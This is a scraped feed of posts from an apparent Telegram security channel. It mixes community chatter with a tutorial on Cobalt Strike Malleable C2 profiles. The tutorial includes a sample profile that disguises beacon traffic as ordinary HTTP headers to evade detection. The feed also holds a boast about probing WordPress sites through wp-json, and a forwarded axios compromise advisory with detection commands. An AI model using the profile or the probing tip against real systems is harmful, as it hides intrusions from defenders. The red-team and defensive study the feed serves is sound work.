AfroSec
so there are 3 DNS records which have impact on email sec > SPF > DKIM > DMARC lets see each one of them SPF:- Sender Policy Framework > lists which servers are allowed to send email for your domain > for instance example.com's SPF record…
Mail-Tester
Newsletters spam test by mail-tester.com
mail-tester.com is a free online service that allows you to test your emails for Spam, Malformed Content and Mail Server Configuration problems
⚡4
Discord
Discord - Group Chat That’s All Fun & Games
Discord is great for playing games and chilling with friends, or even building a worldwide community. Customize your own space to talk, play, and hang out.
yoo so i just created a Red Team Discord
If you're into hacking, redteaming ofc , or learning real-world security come join us.
👉 https://discord.gg/t4tcrF95
Let’s grow and learn together :))
@AfroSec
If you're into hacking, redteaming ofc , or learning real-world security come join us.
👉 https://discord.gg/t4tcrF95
Let’s grow and learn together :))
@AfroSec
⚡6❤1🙏1
Forwarded from vx-underground
> be iranian threat actors
> compromise FBI directors personal email
> fast forward like, 5 hours
> $10,000,000 bounty on head
Opinion: I think Kash Patel is extremely mad
> compromise FBI directors personal email
> fast forward like, 5 hours
> $10,000,000 bounty on head
Opinion: I think Kash Patel is extremely mad
🤯5🤣1
some threat actors get into a system — let’s say your personal computer.
now you’re also a hacker… you think:
“Yeah I can just monitor the traffic with Wireshark and catch them blah blah.”
but here’s the thing…
They can make their traffic look completely legit. how?
Malleable C2 profiles
This is basically a domain-specific language (DSL) introduced by Cobalt Strike that lets redteamers redefine how their beacon(implant) communicates with the TS.
means....
They can disguise malicious traffic to look like:
* browsing social media
* streaming music
* accessing cloud services
So your “suspicious traffic” just looks normal.
Core components:
• HTTP GET / POST
• Global options (sleeptime, useragent, etc.)
• Data transformation & obfuscation (prepend, append, encoding)
what’s happening here?
• Beacon checks in with metadata (ID, hostname, process, etc.)
• Data gets base64 encoded
• Then
• Sent inside a custom header →
Now it just looks like a normal HTTP request header.
Meanwhile…
• Team Server responds with payload
• Encoded + compressed (gzip)
• Still looks legit in traffic
There are a lot of templates on GitHub go check them out
but don’t just copy-paste them
u will get flagged fast :)
Most public profiles are already burned.
Also…
~90% of them are HTTP/S listeners
If you want to go deeper (P2P, SMB, DNS…)
@AfroSec
now you’re also a hacker… you think:
“Yeah I can just monitor the traffic with Wireshark and catch them blah blah.”
but here’s the thing…
They can make their traffic look completely legit. how?
Malleable C2 profiles
This is basically a domain-specific language (DSL) introduced by Cobalt Strike that lets redteamers redefine how their beacon(implant) communicates with the TS.
means....
They can disguise malicious traffic to look like:
* browsing social media
* streaming music
* accessing cloud services
So your “suspicious traffic” just looks normal.
Core components:
• HTTP GET / POST
• Global options (sleeptime, useragent, etc.)
• Data transformation & obfuscation (prepend, append, encoding)
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36";
set jitter 0;
set sleeptime 0;
set timeout 10;
set retry 0;
http-get {
set uri "/afro_checkin.php";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.5";
header "Connection" "keep-alive";
metadata {
base64;
prepend "user=";
header "z-User";
}
}
server {
header "Server" "nginx/1.18.0";
contentencoding "gzip";
output {
print;
}
}
}
what’s happening here?
• Beacon checks in with metadata (ID, hostname, process, etc.)
• Data gets base64 encoded
• Then
"user=" is prepended → user=base64payload• Sent inside a custom header →
z-UserNow it just looks like a normal HTTP request header.
Meanwhile…
• Team Server responds with payload
• Encoded + compressed (gzip)
• Still looks legit in traffic
There are a lot of templates on GitHub go check them out
but don’t just copy-paste them
u will get flagged fast :)
Most public profiles are already burned.
Also…
~90% of them are HTTP/S listeners
If you want to go deeper (P2P, SMB, DNS…)
@AfroSec
🔥3👏1
AfroSec
hmmm 🙃 @AfroSec
thank you guys for your birthday wishes, I really mean it
A lot of new members joined this year too , thank you all for being part of my journey.
much love and respect 😊
@AfroSec
A lot of new members joined this year too , thank you all for being part of my journey.
much love and respect 😊
@AfroSec
❤🔥8❤2
Forwarded from Yekolo Temari (የቆሎ ተማሪ)
📌 If you installed
axios@1.14.1 or axios@0.30.4, assume your system is compromised!🔍 Am I affected?
- MacOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"- Linux
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"- Windows
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISEDFix it:
npm install axios@1.14.0 ← for 1.x usersnpm install axios@0.30.3 ← for 0.x usersrm -rf node_modules/plain-crypto-jsnpm install --ignore-scriptsRead More [ Blog ]
Please open Telegram to view this post
VIEW IN TELEGRAM
𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐠𝐢𝐫𝐥⛧
I’m not someone you can put in one box. I’m just a high school girl who’s been exploring since around grade 7 jumping from Hacking(main hobby) to programming, from philosophy to art, from Robotics to chess. Not because I’m lost, but because I’m curious about…
hey fam
my friend is out here mastering everything from creative hobbies to diving deep into the world of hacking like wow
If you’re into tech, security, or just love seeing someone passionate about leveling up, you should definitely check her out!
Big respect for the grind 💯🔥
so lets show some love and support :))
channel : https://t.me/vxnsec
@AfroSec
my friend is out here mastering everything from creative hobbies to diving deep into the world of hacking like wow
If you’re into tech, security, or just love seeing someone passionate about leveling up, you should definitely check her out!
Big respect for the grind 💯🔥
so lets show some love and support :))
channel : https://t.me/vxnsec
@AfroSec
Telegram
𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐠𝐢𝐫𝐥⛧
Documenting my journey.
|Hacking| and my hobbies
@L4inux
Js random highschool kid
They call m3 Vixy😛
Polymath
|Hacking| and my hobbies
@L4inux
Js random highschool kid
They call m3 Vixy😛
Polymath
❤6⚡3🥱1
heyyy everyone
we are gonna be live on discord just kinda chill event we will solve one AD machine and learn along the way
if u r free check it out now https://discord.gg/XP948E8B :)
@AfroSec
we are gonna be live on discord just kinda chill event we will solve one AD machine and learn along the way
if u r free check it out now https://discord.gg/XP948E8B :)
@AfroSec
Discord
Join the Red1 Discord Server!
Check out the Red1 community on Discord - hang out with 36 other members and enjoy free voice and text chat.
🔥8⚡2
#experience
from what I saw (experience), most Ethiopian websites are CMS-based, mainly WordPress. The funny part is that they completely trust the CMS to handle everything end-to-end, like security or other configurations. but, the fact is that the wp-json schema is enough to gather all their endpoints and do shady stuff 😂 Sometimes they open sensitive directories like wp-includes or wp-content, then forget about their existence, which is a really bad security measure.
@AfroSec
from what I saw (experience), most Ethiopian websites are CMS-based, mainly WordPress. The funny part is that they completely trust the CMS to handle everything end-to-end, like security or other configurations. but, the fact is that the wp-json schema is enough to gather all their endpoints and do shady stuff 😂 Sometimes they open sensitive directories like wp-includes or wp-content, then forget about their existence, which is a really bad security measure.
@AfroSec
🔥3⚡2